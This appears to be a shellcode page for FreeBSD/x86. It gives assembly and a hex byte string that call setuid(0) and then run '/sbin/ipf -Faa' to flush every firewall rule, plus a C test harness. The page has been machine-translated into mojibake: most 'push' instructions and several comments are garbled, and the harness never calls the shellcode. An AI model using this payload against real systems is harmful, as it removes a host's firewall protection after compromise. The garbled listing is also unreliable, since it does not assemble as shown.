FreeBSD/x86 - setuid(0)&execve({\\\"//sbin/ipf\\\",\\\"-Faa\\\",0},0);

¤³¤Î¥Ú¡¼¥¸¤ÏEtoJÃà¸ìËÝÌõ¥Õ¥£¥ë¥¿¤Ë¤è¤Ã¤ÆËÝÌõÀ¸À®¤µ¤ì¤Þ¤·¤¿¡£

FreeBSD/x86 - setuid(0)&execve({\\\"//sbin/ipf\\\",\\\"-Faa\\\",0},0); - 57 bytes

; sm4x - 2008
; setuid(0); execve("//sbin/ipf", {"//sbin/ipf", "-Faa", 0}, 0);
; 57 bytes
; FreeBSD 7.0-RELEASE

Á´À¤³¦¤Î _start

_start:
main:

; --------------------- setuid (0)
xor     eax, eax
xor     ecx, ecx
²¡¤·¿Ê¤á¤ë    eax
²¡¤·¿Ê¤á¤ë        eax
mov     al, 0x17
int     0x80
; --------------------- -Faa
xor     eax, eax
²¡¤·¿Ê¤á¤ë    eax
²¡¤·¿Ê¤á¤ë    0x6161462d      ; -Faa
mov     ecx, esp

; --------------------- ÂÎÀ©¡¿µ¡¹½ //sbin/ipf
²¡¤·¿Ê¤á¤ë    eax
²¡¤·¿Ê¤á¤ë    word 0x6670
²¡¤·¿Ê¤á¤ë    0x692f6e69
²¡¤·¿Ê¤á¤ë    0x62732f2f
mov     ebx, esp

; ---------------------- array ÂÎÀ©¡¿µ¡¹½
²¡¤·¿Ê¤á¤ë    eax
²¡¤·¿Ê¤á¤ë    ecx
²¡¤·¿Ê¤á¤ë    ebx
mov     ecx, esp

; ---------------------- call to execve
²¡¤·¿Ê¤á¤ë    eax
²¡¤·¿Ê¤á¤ë    ecx
²¡¤·¿Ê¤á¤ë    ebx

mov     al, 0x3b
²¡¤·¿Ê¤á¤ë    eax
int     0x80

xor     eax, eax
²¡¤·¿Ê¤á¤ë    eax
²¡¤·¿Ê¤á¤ë    eax
int     0x80

/*

char code[] = "\x31\xc0\x31\xc9\x50\x50\xb0\x17\xcd\x80"
              "\x31\xc0\x50\x68\x2d\x46\x61\x61\x89\xe1"
              "\x50\x66\x68\x70\x66\x68\x69\x6e\x2f\x69"
              "\x68\x2f\x2f\x73\x62\x89\xe3\x50\x51\x53"
              "\x89\xe1\x50\x51\x53\xb0\x3b\x50\xcd\x80"
              "\x31\xc0\x50\x50\xcd\x80";

int main(int argc, char **argv) {
        int (*func)();
        printf("Bytes: %d\n", sizeof(code));
        func = (int (*)()) code;
}

*/